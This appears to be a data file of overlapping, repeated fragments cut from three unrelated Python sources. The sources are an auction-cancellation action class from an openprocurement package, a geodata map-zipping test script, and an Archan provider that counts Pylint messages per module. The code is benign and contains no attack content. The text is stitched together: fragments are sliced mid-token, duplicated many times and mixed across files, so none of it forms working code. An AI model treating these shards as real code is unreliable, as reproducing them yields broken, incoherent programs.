"'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\"",
") from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action",
"(patch status to 'active'): - auction.status will set to 'cancelled' - if procedure",
"procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\" validators = []",
"for activating cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending' and new_status ==",
"to 'active'): - auction.status will set to 'cancelled' - if procedure in statuses",
"instance of Action \"\"\" # check if patch is for activating cancellation new_status",
"new_status == 'active': return cls return False def act(self): auction = self.request.auction #",
"'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) # clean bids after cancellation procedure",
"\"\"\" Cancellation Activation action when auction owner activate cancellation (patch status to 'active'):",
"'active': return cls return False def act(self): auction = self.request.auction # pendify auction",
"\"\"\" # check if patch is for activating cancellation new_status = request.validated['json_data'].get('status') if",
"Activation action when auction owner activate cancellation (patch status to 'active'): - auction.status",
"cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending' and new_status == 'active': return",
"method return instance of Action \"\"\" # check if patch is for activating",
"'pending' and new_status == 'active': return cls return False def act(self): auction =",
"set to 'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all",
"auction owner activate cancellation (patch status to 'active'): - auction.status will set to",
"( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction owner activate",
"= status log_auction_status_change(self.request, self.context, status) # clean bids after cancellation procedure auction_status =",
"and new_status == 'active': return cls return False def act(self): auction = self.request.auction",
"after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION: auction.bids = []",
"( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation",
"@classmethod def demand(cls, request, context): \"\"\" Constructor method. If it is reason of",
"activating cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending' and new_status == 'active':",
"- if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\" validators",
"request, context): \"\"\" Constructor method. If it is reason of action this method",
"to 'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids",
"= 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) # clean bids after cancellation",
"cancellation (patch status to 'active'): - auction.status will set to 'cancelled' - if",
"import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction owner",
"== 'pending' and new_status == 'active': return cls return False def act(self): auction",
"Action \"\"\" # check if patch is for activating cancellation new_status = request.validated['json_data'].get('status')",
"If it is reason of action this method return instance of Action \"\"\"",
"( log_auction_status_change ) from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import (",
") from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction )",
"if context.status == 'pending' and new_status == 'active': return cls return False def",
"'active.auction'] delete all bids \"\"\" validators = [] @classmethod def demand(cls, request, context):",
"def act(self): auction = self.request.auction # pendify auction status status = 'cancelled' auction.status",
"method. If it is reason of action this method return instance of Action",
"['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\" validators = [] @classmethod def demand(cls,",
"action when auction owner activate cancellation (patch status to 'active'): - auction.status will",
"is for activating cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending' and new_status",
"- auction.status will set to 'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry',",
"from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when",
"context): \"\"\" Constructor method. If it is reason of action this method return",
"request.validated['json_data'].get('status') if context.status == 'pending' and new_status == 'active': return cls return False",
"auction.status will set to 'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction']",
"CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction owner activate cancellation (patch status to",
"\"\"\" Constructor method. If it is reason of action this method return instance",
"bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION: auction.bids =",
"# check if patch is for activating cancellation new_status = request.validated['json_data'].get('status') if context.status",
"new_status = request.validated['json_data'].get('status') if context.status == 'pending' and new_status == 'active': return cls",
"= [] @classmethod def demand(cls, request, context): \"\"\" Constructor method. If it is",
"statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\" validators = [] @classmethod def",
"auction.status = status log_auction_status_change(self.request, self.context, status) # clean bids after cancellation procedure auction_status",
"from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class",
"BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction owner activate cancellation",
"this method return instance of Action \"\"\" # check if patch is for",
"self.context, status) # clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status",
"if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\" validators =",
"act(self): auction = self.request.auction # pendify auction status status = 'cancelled' auction.status =",
"check if patch is for activating cancellation new_status = request.validated['json_data'].get('status') if context.status ==",
"bids \"\"\" validators = [] @classmethod def demand(cls, request, context): \"\"\" Constructor method.",
"return cls return False def act(self): auction = self.request.auction # pendify auction status",
"False def act(self): auction = self.request.auction # pendify auction status status = 'cancelled'",
"auction = self.request.auction # pendify auction status status = 'cancelled' auction.status = status",
"pendify auction status status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) #",
"return instance of Action \"\"\" # check if patch is for activating cancellation",
"status status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) # clean bids",
") class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction owner activate cancellation (patch",
"openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction",
"clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION: auction.bids",
"all bids \"\"\" validators = [] @classmethod def demand(cls, request, context): \"\"\" Constructor"
] |
[
"sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\")",
"from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT",
"workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e:",
"import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname =",
"geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt =",
"import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv",
"_EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv",
"\".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path",
"zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt)",
"os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname",
"import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def",
"validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles()",
"sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try:",
"txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ == '__main__': main()",
"import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\",",
"z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if",
"\".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed():",
"= os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\",",
"'..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list =",
"= geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception:",
"= os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path)",
"[\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path)",
"Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ ==",
"= _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\")",
"os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list",
"try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path",
"= validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list)",
"e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ == '__main__':",
"\".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path",
"= [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv =",
"dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\",",
"main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"]",
"\".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path =",
"pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT =",
"#!/usr/bin/python import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import",
"<reponame>BerkeleyLibrary/geodata_pre_ingest<filename>tool_test/test_v_output4_8_get_map_zip_data.py #!/usr/bin/python import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion",
"shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main():",
"zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\",",
"geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0}",
"projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code",
"valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data =",
"geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path =",
"\".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if",
"z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ;",
"= zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e))",
"except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__",
"def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\",",
"if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except",
"process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path =",
"valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception,",
"os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\",",
"\".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path)",
"os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data",
"= geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt"
] |
[
"to Pylint. depth (int): the depth of the matrix to generate. Returns: archan.DSM:",
"pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider'",
"= LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError: run",
"= Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning)",
"of packages. Args: pylint_args (list): the arguments to pass to Pylint. depth (int):",
"Provide matrix data for Pylint messages in a set of packages. Args: pylint_args",
"\"\"\" Provide matrix data for Pylint messages in a set of packages. Args:",
"description = 'Number of Pylint messages per module.' argument_list = ( Argument('pylint_args', list,",
"archan import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter: def",
"argument_list = ( Argument('pylint_args', list, 'Pylint arguments as a list.'), ) def get_data(self,",
"= 'Number of Pylint messages per module.' argument_list = ( Argument('pylint_args', list, 'Pylint",
"( Argument('pylint_args', list, 'Pylint arguments as a list.'), ) def get_data(self, pylint_args=None): \"\"\"",
"import Run class LoggerWriter: def __init__(self, level): self.level = level def write(self, message):",
"Argument('pylint_args', list, 'Pylint arguments as a list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide",
"Argument, DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter: def __init__(self, level): self.level",
"archan.DSM: instance of archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args or",
"Args: pylint_args (list): the arguments to pass to Pylint. depth (int): the depth",
"Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr =",
"Module' description = 'Number of Pylint messages per module.' argument_list = ( Argument('pylint_args',",
"run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities = []",
"sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError:",
"pylint_args=None): \"\"\" Provide matrix data for Pylint messages in a set of packages.",
"name = 'Pylint Provider: Issues per Module' description = 'Number of Pylint messages",
"do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__",
"matrix data for Pylint messages in a set of packages. Args: pylint_args (list):",
"(list): the arguments to pass to Pylint. depth (int): the depth of the",
"k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class",
"!= '\\n': self.level('from pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\"",
"provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module'",
"= Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data",
"= ( Argument('pylint_args', list, 'Pylint arguments as a list.'), ) def get_data(self, pylint_args=None):",
"[] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except",
"of Pylint messages per module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments as",
"the matrix to generate. Returns: archan.DSM: instance of archan DSM. \"\"\" logger =",
"Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try:",
"arguments to pass to Pylint. depth (int): the depth of the matrix to",
"packages. Args: pylint_args (list): the arguments to pass to Pylint. depth (int): the",
"= [] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities)",
"TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities =",
"pylint.lint import Run class LoggerWriter: def __init__(self, level): self.level = level def write(self,",
"class LoggerWriter: def __init__(self, level): self.level = level def write(self, message): if message",
"message): if message != '\\n': self.level('from pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint",
"message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint",
"per Module' description = 'Number of Pylint messages per module.' argument_list = (",
"= 'Pylint Provider: Issues per Module' description = 'Number of Pylint messages per",
"sys.sterr = sys.__stderr__ entities = [] data = [] for k, v in",
"run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty provider,",
"= 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module' description = 'Number of",
"'\\n': self.level('from pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier",
"from archan import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter:",
"try: run = Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout =",
"LoggerWriter: def __init__(self, level): self.level = level def write(self, message): if message !=",
"Run class LoggerWriter: def __init__(self, level): self.level = level def write(self, message): if",
"as a list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide matrix data for Pylint",
") def get_data(self, pylint_args=None): \"\"\" Provide matrix data for Pylint messages in a",
"messages in a set of packages. Args: pylint_args (list): the arguments to pass",
"level def write(self, message): if message != '\\n': self.level('from pylint: ' + message)",
"to pass to Pylint. depth (int): the depth of the matrix to generate.",
"a set of packages. Args: pylint_args (list): the arguments to pass to Pylint.",
"instance of archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args or []",
"module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments as a list.'), ) def",
"logger = Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr =",
"DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug)",
"'Pylint arguments as a list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide matrix data",
"__init__(self, level): self.level = level def write(self, message): if message != '\\n': self.level('from",
"Pylint messages in a set of packages. Args: pylint_args (list): the arguments to",
"= LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False)",
"[] data = [] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return",
"' + message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name",
"entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty provider, please install Archan",
"list, 'Pylint arguments as a list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide matrix",
"for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module' description",
"of the matrix to generate. Returns: archan.DSM: instance of archan DSM. \"\"\" logger",
"in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty",
"def write(self, message): if message != '\\n': self.level('from pylint: ' + message) class",
"Issues per Module' description = 'Number of Pylint messages per module.' argument_list =",
"DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter: def __init__(self, level): self.level =",
"sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data = [] for",
"the arguments to pass to Pylint. depth (int): the depth of the matrix",
"of archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout",
"Provider: Issues per Module' description = 'Number of Pylint messages per module.' argument_list",
"\"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr",
"Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data =",
"exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data = []",
"a list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide matrix data for Pylint messages",
"per module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments as a list.'), )",
"Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module' description =",
"= pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run =",
"= sys.__stderr__ entities = [] data = [] for k, v in run.linter.stats['by_module'].items():",
"identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module' description = 'Number",
"try: from archan import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run class",
"data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty provider, please install",
"sys try: from archan import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run",
"arguments as a list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide matrix data for",
"for Pylint messages in a set of packages. Args: pylint_args (list): the arguments",
"def get_data(self, pylint_args=None): \"\"\" Provide matrix data for Pylint messages in a set",
"or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False)",
"Logger from pylint.lint import Run class LoggerWriter: def __init__(self, level): self.level = level",
"'Number of Pylint messages per module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments",
"data = [] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data,",
"[] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except",
"LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout",
"for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError:",
"= Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr",
"in a set of packages. Args: pylint_args (list): the arguments to pass to",
"Pylint. depth (int): the depth of the matrix to generate. Returns: archan.DSM: instance",
"pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run",
"Pylint messages per module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments as a",
"class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider:",
"if message != '\\n': self.level('from pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint provider",
"'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module' description = 'Number of Pylint",
"set of packages. Args: pylint_args (list): the arguments to pass to Pylint. depth",
"sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args,",
"import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter: def __init__(self,",
"+ message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name =",
"to generate. Returns: archan.DSM: instance of archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args",
"\"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per",
"get_data(self, pylint_args=None): \"\"\" Provide matrix data for Pylint messages in a set of",
"= sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data = [] for k,",
"Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter: def __init__(self, level):",
"generate. Returns: archan.DSM: instance of archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args =",
"list.'), ) def get_data(self, pylint_args=None): \"\"\" Provide matrix data for Pylint messages in",
"messages per module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments as a list.'),",
"depth (int): the depth of the matrix to generate. Returns: archan.DSM: instance of",
"entities = [] data = [] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())])",
"DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty provider, please install Archan and Pylint.\"\"\"",
